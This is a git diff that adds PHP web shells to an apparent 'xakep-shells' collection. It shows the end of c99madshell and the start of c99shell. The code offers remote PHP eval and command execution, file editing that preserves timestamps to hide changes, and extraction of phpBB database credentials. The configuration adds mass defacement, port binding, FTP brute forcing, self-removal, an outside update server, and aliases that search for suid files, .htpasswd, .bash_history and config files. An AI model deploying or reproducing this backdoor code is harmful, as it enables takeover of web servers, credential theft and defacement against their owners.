+  if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
+  else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+        {
+         echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("                ",$ret)) {$ret = str_replace("                ","        ",$ret);}
+   while (ereg("         ",$ret)) {$ret = str_replace("         ","        ",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("        ",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+
+   if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
+   else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("        ",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("DIZ","info"),
+   array("HTML","html"),
+   array("TXT","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("EXE","exe"),
+   array("SDB","sdb"),
+   array("INI","ini"),
+   array("DOWNLOAD","download"),
+   array("RTF","notepad"),
+   array("EDIT","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";}
+   echo " |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "about") {echo "r00t";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d); ?>';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit();
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c99php.txt b/xakep-shells/PHP/c99php.txt
new file mode 100644
index 0000000..f890330
--- /dev/null
+++ b/xakep-shells/PHP/c99php.txt
@@ -0,0 +1,2735 @@
+<?php
+$shver = "1.0 beta (4.02.2005)"; //Current version
+//CONFIGURATION
+$surl = "?"; //link to this script, INCLUDE "?".
+$rootdir = "./"; //e.g "c:", "/","/home"
+$timelimit = 60; //limit of execution this script (seconds).
+
+//Authentication
+
+$login = false; //login
+//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
+$pass = "team"; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+//$login = false; //turn off authentication
+
+$autoupdate = true; //Automatic updating?
+
+$updatenow = false; //If true, update now
+
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
+
+$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
+
+$filestealth = 1; //if true, don't change modify&access-time
+
+$donated_html = ""; //If you publish free shell and you wish
+					//add link to your site or any other information,
+					//put here your html.
+$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
+
+$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
+
+$curdir = "./"; //start directory
+
+$tmpdir = dirname(__FILE__); //Directory for tempory files
+  
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	// default password for binding
+$bindport_port = "11457";	// default port for binding
+
+/* Command-aliases system */
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+/* ����� �� ������� ���� ������ � suid ����� */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ����� � ������� ���������� ���� ������ � suid ����� */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+/* ����� �� ������� ���� ������ � sgid ����� */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ����� � ������� ���������� ���� ������ � sgid ����� */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ����� �� ������� ������ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ����� �� ������� ������ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ����� � ������� ���������� ������ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ����� �� ������� ������ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ����� � ������� ���������� ������ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ����� �� ������� ������ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ����� � ������� ���������� ������ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ����� ���� ������ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ����� � ������� ���������� ������ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ����� ���� ������ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ����� � ������� ���������� ������ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* ����� ������ ��������� ������ �� �������� ������� ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* �������� �������� ������ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+
+$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
+$sess_cookie = "c99shvars"; // cookie-variable name
+
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Delete copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
+$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
+$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
+$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
+$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
+$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
+$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
+$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
+$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
+
+//Hignlight-code colors
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+
+@$f = $_GET[f];
+
+//END CONFIGURATION
+
+// 				\/	Next code not for editing	 \/
+
+
+//Starting calls
